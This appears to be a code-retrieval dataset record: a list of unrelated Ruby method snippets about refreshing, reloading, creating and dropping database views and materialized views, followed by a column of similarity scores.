"def rename_materialized_view(name, new_name, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :rename_to => new_name\n }, options).to_sql\n end",
"def reload! view: nil\n view ||= :SCHEMA_VIEW\n @grpc = service.get_table instance_id, name, view: view\n @loaded_views = Set[view]\n self\n end",
"def refresh\n Vedeu.trigger(:_refresh_, current)\n end",
"def view name, query={}, &block\n unless design_doc_fresh\n refresh_design_doc\n end\n query[:raw] = true if query[:reduce] \n raw = query.delete(:raw)\n view_name = \"#{design_doc_slug}/#{name}\"\n fetch_view_with_docs(view_name, query, raw, &block)\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def refresh\n Vedeu.trigger(\"_refresh_#{current}_\".to_sym)\n end",
"def reload! view: nil\n ensure_service!\n @view = view || @view\n @grpc = service.get_schema name, @view\n @reference = nil\n @exists = nil\n self\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def refresh_v1\n V1_REPORTING_VIEWS.each do |name|\n benchmark_and_statsd(name) do\n klass = name.constantize\n klass.refresh\n end\n end\n end",
"def test_materialized_view_metadata_updates\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n mv_meta = @cluster.keyspace('simplex').materialized_view('mv1')\n assert_equal 'SizeTieredCompactionStrategy', mv_meta.options.compaction_strategy.class_name\n\n @session.execute(\"ALTER MATERIALIZED VIEW simplex.mv1 WITH compaction = { 'class' : 'LeveledCompactionStrategy' }\")\n @cluster.refresh_schema\n mv_meta = @cluster.keyspace('simplex').materialized_view('mv1')\n assert_equal 'LeveledCompactionStrategy', mv_meta.options.compaction_strategy.class_name\n end",
"def refresh\n do_refresh\n end",
"def refresh\n do_refresh\n end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def refresh\n do_refresh\n self\n end",
"def refresh_view(view)\n notify_observers :refreshing_view, view.controller, self, view\n view.configure\n view.proxy.refresh\n @configured = true\n end",
"def cluster_materialized_view(name, index_name)\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :cluster_on => index_name\n }).to_sql\n end",
"def drop_materialized_view(name, **kwargs)\n supports_materialized_view!\n\n execute build_drop_materialized_view_query(name, **kwargs)\n end",
"def all\n Vedeu.timer('Refreshing all'.freeze) do\n Vedeu.interfaces.zindexed.each do |interface|\n Vedeu.trigger(:_refresh_view_, interface.name)\n end\n end\n end",
"def by_name\n refresh_view if refresh_view?\n\n cursor.render\n end",
"def refresh(*args)\n alloc(*args).refresh\n end",
"def reload\n @view = nil\n end",
"def refresh\n # FIXME\n end",
"def refresh\n store\n\n render\n\n self\n end",
"def update_views\n gauges_config = YAML.load_file(\"#{CACHE_DIR_PATH}/config\")\n views = load_views\n last_run = gauges_config[:last_run] || gauges_config[:signup_date]\n yesterday = Date.today - 1\n\n if last_run.nil?\n views = fetch_views(views, yesterday, gauges_config[:token])\n elsif last_run && last_run != Date.today\n for date in last_run..yesterday do\n views = fetch_views(views, date, gauges_config[:token])\n end\n end\n\n cache_views(views)\n update_last_run(gauges_config)\n end",
"def refresh\n @server.make_json_request('show.refresh', tvdbid: @tvdbid)['message']\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def RedrawAllViews(arg0 = nil)\n ret = _invoke(1610743947, [arg0], [VT_DISPATCH])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def refresh\n end",
"def refresh\n send_cmd \"refresh\"\n nil\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def refresh!(*args)\n alloc(*args).refresh!\n end",
"def alter_materialized_view_reset_options(name, *args)\n options = args.extract_options!\n\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :reset_options => args\n }, options).to_sql\n end",
"def test_materialized_view_metadata_drop\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n\n @session.execute(\"DROP MATERIALIZED VIEW simplex.mv1\")\n @cluster.refresh_schema\n refute @cluster.keyspace('simplex').has_materialized_view?('mv1')\n end",
"def refresh\n end",
"def refresh\n end",
"def refresh\r\n command 'refresh'\r\n end",
"def refresh\r\n command 'refresh'\r\n end",
"def reload\n refresh\n end",
"def reload\n refresh\n end",
"def refresh\n self.operation = \"#{operation}#refresh\"\n\n return if params_missing?\n\n # Connection settings\n set_connection_data!\n logger.info_ext(operation, \"Connection set successfully\")\n\n # Get all tasks\n tasks, @refresh_state_uuid = {}, SecureRandom.uuid\n @parts_requested_cnt, @parts_received_cnt = Concurrent::AtomicFixnum.new(0), Concurrent::AtomicFixnum.new(0)\n @source_refs_requested, @source_refs_received = [], Concurrent::Array.new\n\n params.to_a.each do |task|\n if task['task_id'].blank? || task['source_ref'].blank?\n logger.warn_ext(operation, \"Missing data for task: #{task}\")\n next\n end\n tasks[task['task_id']] = task['source_ref']\n\n if tasks.length == REFS_PER_REQUEST_LIMIT\n refresh_part(tasks)\n tasks = {}\n end\n end\n\n refresh_part(tasks) unless tasks.empty?\n\n archive_not_received_service_instances unless on_premise?\n rescue => err\n metrics_err_type = on_premise? ? :receptor : :cloud unless endpoint.nil?\n metrics&.record_error(metrics_err_type || :general)\n logger.error_ext(operation, \"Error: #{err.message}\\n#{err.backtrace.join(\"\\n\")}\")\n end",
"def supports_materialized_views?\n false\n end",
"def refresh\r\n end",
"def perform_reload\n api.stack_plan_reload(self)\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def refresh\n update_databases()\n render json: {message: \"Information will be updated shortly\"}, status: :ok\n end",
"def refresh!\n refresh\n @window.refresh\n end",
"def each_materialized_view(&block)\n if block_given?\n @views.each_value do |v|\n yield(v) if v.base_table\n end\n self\n else\n result = []\n @views.each_value do |v|\n result << v if v.base_table\n end\n result\n end\n end",
"def remove_cluster_from_materialized_view(name)\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :remove_cluster => true\n }).to_sql\n end",
"def refresh\n @window.refresh\n end",
"def refresh; end",
"def refresh_index\n attributes = {}\n attributes[:collection_id] = @collection.id\n attributes[:user_id] = current_user.id\n RefreshCollectionResourcesJob.perform_later(attributes)\n # to perform directly (without worker) uncomment below and comment above\n # @collection.refresh_index(user_id: current_user.id)\n redirect_to [:admin, @collection, Resource], notice: 'Resource Index Update Job Successfully Started'\n end",
"def create_materialized_view(name, body = nil, force: false, **kwargs, &block)\n supports_materialized_view!\n\n drop_materialized_view(name) if force && table_exists?(name)\n\n execute build_create_materialized_view_query(name, body, **kwargs, &block)\n end",
"def refresh; schedule_update end",
"def recall_map_view\n get :map_view\n end",
"def refresh_index\n Elastic::Rebound.client.refresh({:index => @index_name})\n end",
"def process\n @type = 'refresh'\n full_analysis\n end",
"def refresh\n load if changed?\n end",
"def refresh()\r\n Fiber.yield\r\n end",
"def refresh()\r\n Fiber.yield\r\n end",
"def refresh\n if address.resolve(current_actor)\n begin\n @refreshed_at = Time.now\n if synchronize.value(refresh_timeout)\n cluster.handle_refresh(current_actor)\n else\n down\n end\n rescue Timeout::Error\n down\n end\n end\n end",
"def group_reload\n\t\tRails.application.load_seed \n\t\t@items = Item.all\n\t\trender 'index'\n\tend",
"def drop_materialized_view(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP MATERIALIZED VIEW '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |v| quote_view_name(v) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def refresh!; end",
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def do_refresh(recurse=true)\n Thread.new do\n file_tree_mutex.synchronize do\n @tree.refresh\n @tree.model.refilter\n @tree.expand_first_row\n end\n end\n end",
"def view_materialized_at(name)\n status = view_status(name)\n Date.parse(status['materializedAt']) rescue nil\n end",
"def refresh\n\t\t@frame.updateGrid\n\t\tself.update\n\t\treturn self\n\tend",
"def view(name = \"\", viewpoint: :total, elements: :all, relationships: :for_elements)\n dia = __model.diagrams.find { |diagram| diagram.name == name }\n __model.remove_reference(dia) if dia\n __model.diagrams << View.new(__model, name, dia&.id, viewpoint, elements, relationships).render\n end",
"def generic_view(view_name, find_function, reduce_function = nil, options = {})\n return_json = options.delete(:return_json)\n order = options.delete(:order) || default_sort_order\n readonly = options.delete(:readonly)\n \n if options.delete(:view_type) == :slow\n result = query_slow_view(find_function, reduce_function, options)\n else\n result = query_view(view_name, find_function, reduce_function, options)\n end\n \n if return_json\n result\n else\n instantiate_instances(result, readonly, order)\n end\n end",
"def reload\n clear_memoizations!\n perform_reload\n self\n end",
"def refresh\n raise NotImplementedError.new('I do not know how to refresh myself, please implement it in subclass.')\n end",
"def refresh!\n load if changed?\n end",
"def view(name, &block)\n @views[name] = block\n end",
"def reload_data\n reset_collection_data\n reload_collection_data\n end",
"def mrender(name, options={ layout: false })\n render_options = { views: settings.multi_tenant_views }.merge(options)\n erb name, render_options\n end",
"def refresh\n render :partial => 'scheduler/user_course_list', :layout => false\n end",
"def refresh\n @mtus = nil\n end",
"def refresh_task_table\n @task_table.refresh(@download_manager, @resolver_manager)\n end",
"def refresh\n\t\t\treturn if completed?\n\t\t\t_runner.refresh\n\t\tend",
"def refresh!\n raise NotImplementedError, \"#refresh! is not implemented on #{@provider}:#{@type}\"\n end",
"def view_query(design_document_name, view_name, options = Options::View::DEFAULT)\n resp = @backend.document_view(@name, design_document_name, view_name, options.namespace, options.to_backend)\n ViewResult.new do |res|\n res.meta_data = ViewMetaData.new do |meta|\n meta.total_rows = resp[:meta][:total_rows]\n meta.debug_info = resp[:meta][:debug_info]\n end\n res.rows = resp[:rows].map do |entry|\n ViewRow.new do |row|\n row.id = entry[:id] if entry.key?(:id)\n row.key = JSON.parse(entry[:key])\n row.value = JSON.parse(entry[:value])\n end\n end\n end\n end",
"def reload\n\t\tself.request( :reload )\n\tend",
"def index\n self.refresh if params[:refresh]\n respond_to do |format|\n format.html\n format.json { render json: RapportsDatatable.new(view_context) }\n end\n end",
"def view(name, &block)\n API::Composition.build { view(name, &block) }\n end",
"def refresh!\n records true\n self\n end",
"def reload!\n callsite = Callsites[@callsite_key]\n rows_hash = rows_by_key(callsite.primary_key)\n sql = callsite.reload_sql(rows_hash.keys, @fetched_columns)\n new_rows = callsite.connection.send(:select, sql, \"#{callsite.model_class_name} Reload SlimScrooged\")\n new_rows.each do |row|\n if old_row = rows_hash[row[callsite.primary_key]]\n old_row.result_set = nil\n old_row.monitored_columns.merge!(row)\n end\n end\n end",
"def refresh\n session.cluster.refresh\n rescue => e\n raise ConnectionFailed, e\n end",
"def execute\n #log_on_error do\n synchronise_viewmodel_with_controller\n action.call\n refresh_view unless asynchronous?\n #end if can_execute?\n end"
] |
[
"0.7993562",
"0.7882737",
"0.75135463",
"0.7201716",
"0.6636582",
"0.643207",
"0.6383927",
"0.6365476",
"0.6278349",
"0.610675",
"0.60786706",
"0.6030206",
"0.59427327",
"0.58854914",
"0.58234787",
"0.5808679",
"0.5808097",
"0.5795441",
"0.5790887",
"0.5762876",
"0.5745043",
"0.5745043",
"0.57378817",
"0.5649664",
"0.56081915",
"0.5574537",
"0.55424905",
"0.55151147",
"0.55043393",
"0.54438114",
"0.5409293",
"0.53662443",
"0.5355622",
"0.5338812",
"0.532208",
"0.5300509",
"0.5289734",
"0.5280354",
"0.525992",
"0.52188426",
"0.5215091",
"0.5205275",
"0.51893514",
"0.5183296",
"0.51770526",
"0.51770526",
"0.5136274",
"0.5136274",
"0.51165974",
"0.51165974",
"0.51052994",
"0.5097711",
"0.50848025",
"0.5064953",
"0.5062602",
"0.5028481",
"0.50272894",
"0.50262624",
"0.49983534",
"0.4989587",
"0.49798235",
"0.49701354",
"0.49659824",
"0.49605227",
"0.49569884",
"0.49516892",
"0.49507922",
"0.49347454",
"0.4923314",
"0.4923314",
"0.49191186",
"0.4893518",
"0.48883593",
"0.4882581",
"0.48735765",
"0.48690498",
"0.48673242",
"0.48668763",
"0.48422128",
"0.48420975",
"0.4836561",
"0.48287153",
"0.48224863",
"0.4803017",
"0.47791588",
"0.47675723",
"0.4757284",
"0.475516",
"0.47405723",
"0.47396147",
"0.47372442",
"0.47273585",
"0.47235304",
"0.47170863",
"0.47147524",
"0.47119644",
"0.47110978",
"0.47016707",
"0.46944538",
"0.46927088"
] |
0.8195975
|
0
|
Reset the primary key sequence for the given table, basing it on the maximum current value of the table's primary key.
|
def reset_primary_key_sequence(table)
  return unless seq = primary_key_sequence(table)
  pk = SQL::Identifier.new(primary_key(table))
  db = self
  s, t = schema_and_table(table)
  table = Sequel.qualify(s, t) if s

  # PostgreSQL 10+ exposes sequence metadata via the pg_sequence catalog;
  # older servers require selecting from the sequence relation itself.
  if server_version >= 100000
    seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))
    increment_by = :seqincrement
    min_value = :seqmin
  # :nocov:
  else
    seq_ds = metadata_dataset.from(LiteralString.new(seq))
    increment_by = :increment_by
    min_value = :min_value
  # :nocov:
  end

  # setval with false as the final argument makes the next nextval return
  # MAX(pk) + increment (or the sequence minimum for an empty table)
  # rather than the value after it.
  get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}
end
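
A hedged usage sketch follows; DB and the :items table are illustrative assumptions, not part of the adapter. The typical trigger is a bulk import with explicit primary key values, which leaves the serial/identity sequence behind MAX(id).

# Sketch: realign the sequence after importing rows with explicit ids.
# Assumes DB is a PostgreSQL Sequel::Database and :items has a
# serial/identity primary key named id.
DB[:items].import([:id, :name], [[100, 'a'], [101, 'b']])

# Without this call, the next implicitly generated id could collide with
# 100 or 101 and raise a unique-constraint violation.
DB.reset_primary_key_sequence(:items)

DB[:items].insert(name: 'c') # next id continues past the table maximum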
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def clear_sequence_setup(database, table)\n table_options = options(table)\n if table_options[:adjust_sequences]\n session.send(database).clear_sequence_setup(\n table_options[:rep_prefix], table\n )\n end\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def test_resets_to_min_pk_with_default_pk_and_sequence\n @instances.each do |instance|\n model = instance.class\n model.delete_all\n model.connection.reset_pk_sequence!(model.table_name)\n\n instance.save!\n assert_equal 1, instance.id, \"Sequence reset for #{model.table_name} failed.\"\n end\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def reset_id\n ActiveRecord::Base.connection.execute(\\\n #'ALTER TABLE category AUTO_INCREMENT = 1')\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'cate'\")\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \"DELETE FROM categories; DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \n #\n # @adapter = ActiveRecord::Base.connection.adapter_name\n# \n # @key = maximum(primary_key)\n\n end",
"def test_resets_to_min_pk_with_specified_pk_and_sequence\n @instances.each do |instance|\n model = instance.class\n model.delete_all\n model.connection.reset_pk_sequence!(model.table_name, model.primary_key, model.sequence_name)\n\n instance.save!\n assert_equal 1, instance.id, \"Sequence reset for #{model.table_name} failed.\"\n end\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def reset_db_peak_sequence\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.reset_pk_sequence!(t)\n end\nend",
"def reset_db_peak_sequence\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.reset_pk_sequence!(t)\n end\nend",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND 